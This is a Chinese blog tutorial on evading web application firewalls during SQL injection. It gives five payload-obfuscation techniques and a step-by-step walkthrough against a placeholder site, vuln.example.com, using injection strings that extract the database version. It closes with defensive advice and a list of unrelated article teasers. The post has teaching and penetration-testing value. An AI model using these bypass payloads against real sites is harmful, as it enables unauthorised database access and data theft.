当前位置: 首页 > article >正文

如何绕过WAF实现SQL注入攻击?​

article 2026/1/26 8:32:19
引言​

在渗透测试中,SQL注入(SQLi)始终是Web安全的核心漏洞之一。然而,随着企业广泛部署Web应用防火墙(WAF),传统的注入攻击往往会被拦截。本文将分享一种​​绕过WAF检测的SQL注入技巧​​,并通过实战案例演示如何利用该漏洞。
​注意:本文仅用于授权测试场景,未经许可的攻击行为属于违法!​

目录

​​一、WAF的检测原理与常见规则​​

​​二、绕过WAF的5种实用技巧​​

​​1. 大小写混合与随机空白符​​

​​2. 注释符内联分割​​

​​3. 超长参数污染​​

​​4. 编码混淆​​

​​5. 时间盲注绕过​​

​​三、实战案例:绕过云WAF获取数据库信息​​

​​目标环境​​

​​步骤演示​​

​​四、防御建议​​

​​五、总结​​

​一、WAF的检测原理与常见规则​

WAF通过正则表达式、语义分析或机器学习模型识别恶意请求。常见的拦截规则包括:

  1. 检测敏感关键词(如UNIONSELECTSLEEP)。
  2. 拦截特殊符号(如单引号'、注释符--)。
  3. 限制异常请求频率(如短时间内大量错误查询)。

​绕过思路​​:通过混淆攻击载荷,绕过正则匹配和语义分析。

​二、绕过WAF的5种实用技巧​

​1. 大小写混合与随机空白符​

WAF的正则规则通常区分大小写,通过混合大小写插入随机空白符可绕过检测。
​示例​​:

uNiOn%0AseLeCt%0A1,2,3--+
  • %0A为换行符的URL编码,破坏正则表达式匹配。
​2. 注释符内联分割​

利用注释符(/​**​/)分割关键词,干扰WAF的语义分析。
​示例​​:

UN/​**​/ION SEL/​**​/ECT 1,2,3 FROM users--+
​3. 超长参数污染​

提交超长参数触发WAF的缓冲区限制,导致其跳过检测。
​示例​​:

GET /search?q=test' AND 1=1--&padding=AAAA...(填充1MB垃圾数据)
​4. 编码混淆​

对攻击载荷进行多重编码(如URL编码、Unicode编码)。
​示例​​:

%55%4E%49%4F%4E%20%53%45%4C%45%43%54%20%40%40%76%65%72%73%69%6F%6E

(解码后为UNION SELECT @@version

​5. 时间盲注绕过​

利用时间盲注的延迟特性,避免触发WAF的响应内容检测。
​示例​​:

' AND IF(ASCII(SUBSTR(database(),1,1))=115, SLEEP(5), 1)--+
  • 通过响应时间差异判断数据库名首字母是否为s(ASCII码115)。

​三、实战案例:绕过云WAF获取数据库信息​

​目标环境​
  • 目标网站:https://vuln.example.com/product?id=1
  • 部署的WAF:某云厂商的默认规则集。
​步骤演示​

  1. ​探测注入点​​:
    输入id=1'触发错误,但被WAF拦截。
    ​绕过方法​​:改用id=1%27%0A'的URL编码+换行符)。

  2. ​判断字段数​​:
    使用ORDER BY探测字段数,但ORDER BY 5被拦截。
    ​绕过方法​​:

    id=1%27%0AOR%0A1%0AGROUP%0ABY%0A5--+

  3. ​联合查询提取数据​​:
    原始Payload被拦截:

    UNION SELECT 1,2,3,4,5

    ​绕过方法​​:

    id=-1%27%0AUnIoN%0A/*!SeLeCt*/%0A1,@@version,3,4,5%0A--+
    • /*!...*/为MySQL内联注释,强制特定版本执行。

  4. ​结果提取​​:
    页面返回数据库版本信息(如5.7.34),确认注入成功。

​四、防御建议​

  1. ​代码层防御​​:

    • 使用参数化查询(如PreparedStatement)。
    • 对输入进行严格白名单校验。

  2. ​WAF配置优化​​:

    • 启用语义分析引擎(而非仅正则匹配)。
    • 配置频率限制和异常行为检测。

  3. ​日志监控​​:

    • 记录所有异常请求,分析攻击特征。

​五、总结​

绕过WAF的SQL注入需要结合对目标防护规则的深入分析,灵活运用混淆技术。作为防御方,需通过多层防护机制(代码安全+WAF+监控)构建纵深防御体系。

​渗透测试的本质是模拟攻击以提升安全性,而非破坏。​​ 所有测试务必在授权范围内进行!

相关文章:

如何绕过WAF实现SQL注入攻击?​

引言​​ 在渗透测试中,SQL注入(SQLi)始终是Web安全的核心漏洞之一。然而,随着企业广泛部署Web应用防火墙(WAF),传统的注入攻击往往会被拦截。本文将分享一种​​绕过WAF检测的SQL注入技巧​​…...

编程日记 2025/11/30 13:22:25

如何使用通义灵码完成PHP单元测试 - AI辅助开发教程

一、引言 在软件开发过程中,测试是至关重要的一环。然而,在传统开发中,测试常常被忽略或草草处理,很多时候并非开发人员故意为之,而是缺乏相应的测试思路和方法,不知道如何设计测试用例。随着 AI 技术的飞…...

编程日记 2026/1/25 0:28:25

pig 权限管理开源项目学习

pig 源码 https://github.com/pig-mesh/pig 文档在其中,前端在文档中,官方视频教学也在文档中有。 第一次搭建,建议直接去看单体视频,照着做即可,需 mysql,redis 基础。 文章目录 项目结构Maven 多模块项…...

编程日记 2026/1/23 11:01:53

设计模式:依赖倒转原则 - 依赖抽象,解耦具体实现

一、为什么用依赖倒转原则? 在软件开发中,类与类之间的依赖关系是架构设计中的关键。如果依赖过于紧密,系统的扩展性和维护性将受到限制。为了应对这一挑战,依赖倒转原则(Dependency Inversion Principle,…...

编程日记 2025/11/26 1:39:29

探秘Transformer系列之(26)--- KV Cache优化 之 PD分离or合并

探秘Transformer系列之(26)— KV Cache优化 之 PD分离or合并 文章目录 探秘Transformer系列之(26)--- KV Cache优化 之 PD分离or合并0x00 概述0x01 背景知识1.1 自回归&迭代1.2 KV Cache 0x02 静态批处理2.1 调度策略2.2 问题…...

编程日记 2026/1/25 11:28:11

鸿蒙5.0 非桌面页面,设备来电后挂断,自动返回桌面

1.背景 其实在Android上面打开一个应用,然后设备来电后挂断应该是返回到前面打开的这个应用的,但是在鸿蒙里面现象是直接返回桌面,设计如此 2.分析 这个分析需要前置知识,鸿蒙的任务栈页面栈,具体参考如下链接: zh-cn/application-dev/application-models/page-missio…...

编程日记 2025/11/14 1:07:20

C++语言程序设计——02 变量与数据类型

目录 一、变量与数据类型(一)变量的数据类型(二)变量命名规则(三)定义变量(四)变量赋值(五)查看数据类型 二、ASCII码三、进制表示与转换(一&…...

编程日记 2026/1/23 12:31:05

Model Context Protocol (MCP) - 尝试创建和测试一下MCP Server

1.简单介绍 MCP是Model Context Protocol的缩写,是Anthropic开源的一个标准协议。MCP使得大语言模型可以和外部的数据源,工具进行集成。当前MCP在社区逐渐地流行起来了。同时official C# SDK(仓库是csharp-sdk) 也在不断更新中,目前最新版本…...

编程日记 2026/1/23 11:29:55

十四种逻辑器件综合对比——《器件手册--逻辑器件》

目录 逻辑器件 简述 按功能分类 按工艺分类 按电平分类 特殊功能逻辑器件 应用领域 详尽阐述 1 逻辑门 一、基本概念 二、主要类型 三、实现方式 四、应用领域 2 反相器 工作原理 基本功能 主要应用 常见类型 特点 未来发展趋势 3 锁存器 基本概念 工作原理 主要类型…...

编程日记 2026/1/19 8:25:56

将已有 SVN 服务打包成 Docker 镜像的详细步骤

将已有 SVN 服务打包成 Docker 镜像的详细步骤 一、服务器环境准备 在开始将 SVN 服务打包成 Docker 镜像之前,我们需要确保目标服务器的环境满足一定条件。 首先要确保目标服务器已安装 Docker。同时服务器可以连接互联网,可以通过以下简单命令来验证…...

编程日记 2026/1/19 5:02:58

python文件打包无法导入ultralytics模块

💥打包的 .exe 闪退了?别慌!教你逐步排查 PyInstaller 打包的所有错误! 🛠 运行 .exe 查看报错信息✅ 正确姿势: ⚠ importlib 动态导入导致打包失败❓什么是动态导入?✅ 解决方式: …...

编程日记 2026/1/23 12:15:12

AMBA-CHI协议详解(二十六)

AMBA-CHI协议详解(一)- Introduction AMBA-CHI协议详解(二)- Channel fields / Read transactions AMBA-CHI协议详解(三)- Write transactions AMBA-CHI协议详解(四)- Other transactions AMBA-CHI协议详解(五)- Transaction identifier fields AMBA-CHI协议详解(六…...

编程日记 2026/1/23 10:24:24

Go小技巧易错点100例(二十六)

本期分享: 1. string转[]byte是否会发生内存拷贝 2. Go程序获取文件的哈希值 正文: string转[]byte是否会发生内存拷贝 在Go语言中,字符串转换为字节数组([]byte)确实会发生内存拷贝。这是因为在Go中,字…...

编程日记 2026/1/23 9:33:20

FPGA_BD Block Design学习(一)

PS端开发流程详细步骤 1.第一步:打开Vivado软件,创建或打开一个工程。 2.第二步:在Block Design中添加arm核心,并将其配置为IP核。 3.第三步:配置arm核心的外设信息,如DDR接口、时钟频率、UART接口等。 …...

编程日记 2026/1/23 12:00:32

ubuntu20.04+qt5.12.8安装serialbus

先从官网https://download.qt.io/archive/qt/5.12/5.12.8/submodules/ 下载 qtserialbus-everywhere-src-5.12.8.tar.xz 有需要其他版本的点击返回上一级自行寻找对应版本。 也可从 https://download.csdn.net/download/zhouhui1982/90595810 下载 在终端中依次输入以下命令…...

编程日记 2026/1/23 11:35:05

银河麒麟V10 Ollama+ShellGPT打造Shell AI助手——筑梦之路

环境说明 1. 操作系统版本: 银河麒麟V10 2. CPU架构:X86 3. Python版本:3.12.9 4. 大模型:mistral:7b-instruct 准备工作 1. 编译安装python 3.12 # 下载python 源码wget https://www.python.org/ftp/python/3.12.9/Python-3.12.9.tg…...

编程日记 2025/9/11 0:22:36

python求π近似值

【问题描述】用公式π/4≈1-1/31/5-1/7..1/(2*N-1).求圆周率PI的近似值。 从键盘输入一个整数N值,利用上述公式计算出π的近似值,然后输出π值,保留小数后8位。 【样例输入】1000 【样例输出】3.14059265 def countpi(N):p0040nowid0for i i…...

编程日记 2025/9/11 16:10:30

基于 Spring Boot + Vue 的 [业务场景] 管理系统设计与实现

技术范围:SpringBoot、Vue、SSM、HLMT、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、小程序、安卓app、大数据、物联网、机器学习等设计与开发。 主要内容:免费功能设计、开题报告、任务书、中期检查PPT、系统功能实现、代码编写、论文编写和辅导、论文…...

编程日记 2025/10/31 8:11:02

如何查看自己抖音的IP属地?详细教程+常见问题解答

在当今互联网时代,IP属地信息已成为各大社交平台(如抖音、微博、快手等)展示用户真实网络位置的重要功能。无论是出于隐私保护、账号安全,还是单纯好奇自己的IP归属地,了解如何查看抖音IP属地都很有必要。 本文将详细介…...

编程日记 2026/1/23 12:13:48

⑪数据中心网络M-LAG实战

一、DeviceA-M-LAG-Mater配置 1、M-LAG 系统配置。 # m-lag mad exclude interface GigabitEthernet1/0/7 m-lag mad exclude interface Vlan-interface100 m-lag mad exclude interface Vlan-interface101 m-lag system-mac 0002-0002-0002 m-lag system-number 1 m-la…...

编程日记 2026/1/23 8:02:39

化工企业数字化转型:从数据贯通到生态重构的实践路径

一、战略定位:破解行业核心痛点 化工行业面临生产安全风险高(全国危化品企业事故率年增5%)、能耗与排放压力大(占工业总能耗12%)、供应链协同低效(库存周转率低于制造业均值30%)三大挑战。《石…...

编程日记 2026/1/23 12:18:15

JAVA——初识JAVA

文章目录 如何在cmd上编译、运行代码解析String[] args中放的是什么Java结构编译运行可能遇到的错误Java中的注释Java的三种注释编码不一致的问题 IDEA常用基础开发快捷键补齐快捷键注释快捷键 IDEA的基础调式方法标识符 如何在cmd上编译、运行 在没有集成开发环境下&#xff…...

编程日记 2026/1/23 6:21:24

Shell脚本的学习

编写脚本文件 定义以开头:#!/bin/bash #!用来声明脚本由什么shell解释,否则使用默认shel 第一步:编写脚本文件 #!/bin/bash #注释 echo "这是输出" 第二步:加上执行权限:chmod x 脚本文件名.sh 第三步&…...

编程日记 2026/1/23 11:41:44

专题十四:动态路由——OSPF

一、OSPF简介 开放式最短路径优先OSPF(Open Shortest Path First)是IETF组织开发的一个基于链路状态的内部网关协议(Interior Gateway Protocol),采用DIjkstra算法,协议号是89。用于自治系统(A…...

编程日记 2026/1/23 12:41:38

聊聊Spring AI的Multimodality

序 本文主要研究一下Spring AI的Multimodality 示例 chatModel示例 var imageResource new ClassPathResource("/multimodal.test.png");var userMessage new UserMessage("Explain what do you see in this picture?", // contentnew Media(MimeTy…...

编程日记 2025/11/26 7:13:21

区块链点燃游戏行业新未来——技术变革与实践指南

区块链点燃游戏行业新未来——技术变革与实践指南 在数字时代,游戏行业无疑是创新的热土。从简单像素风的街机游戏到沉浸式的虚拟现实,我们见证了技术如何一步步塑造游戏的样貌。然而,在传统游戏模式中,玩家权益往往无法得到保障…...

编程日记 2025/12/28 7:18:50

Cocos Creator Shader入门实战(八):Shader实现圆形、椭圆、菱形等头像

引擎:3.8.5 您好,我是鹤九日! 回顾 Shader的学习是一条漫长的道路。 理论知识的枯燥无味,让很多人选择了放弃。然而不得不说:任何新知识、新领域的学习,本身面临的都是问题! 互联网和AI给了我…...

编程日记 2026/1/23 12:01:58

大模型SFT用chat版还是base版 SFT后灾难性遗忘怎么办

大模型SFT用chat版还是base版 进行 SFT 时,基座模型选用 Chat 还是 Base 模型? 选 Base 还是 Chat 模型,首先先熟悉 Base 和 Chat 是两种不同的大模型,它们在训练数据、应用场景和模型特性上有所区别。 在训练数据方面&#xf…...

编程日记 2025/12/20 2:08:14

【AI论文】VCR-Bench:视频链式思考推理的综合评估框架

摘要:思想链(CoT)推理的进步显著增强了大型语言模型(LLMs)和大型视觉语言模型(LVLMs)的能力。 然而,目前仍然缺乏一个严格的视频CoT推理评估框架。 目前的视频基准测试无法充分评估推…...

编程日记 2026/1/23 12:14:21

数据中台、BI业务访谈(二):组织架构梳理的坑

这是数据中台、BI业务访谈系列的第二篇文章,在上一篇文章中,我重点介绍了在给企业的业务部门、高层管理做业务访谈之前我们要做好行业、业务知识的功课。做好这些功课之后,就到了实际的访谈环节了。 业务访谈关键点 那么在具体业务访谈的时…...

编程日记 2026/1/24 15:07:35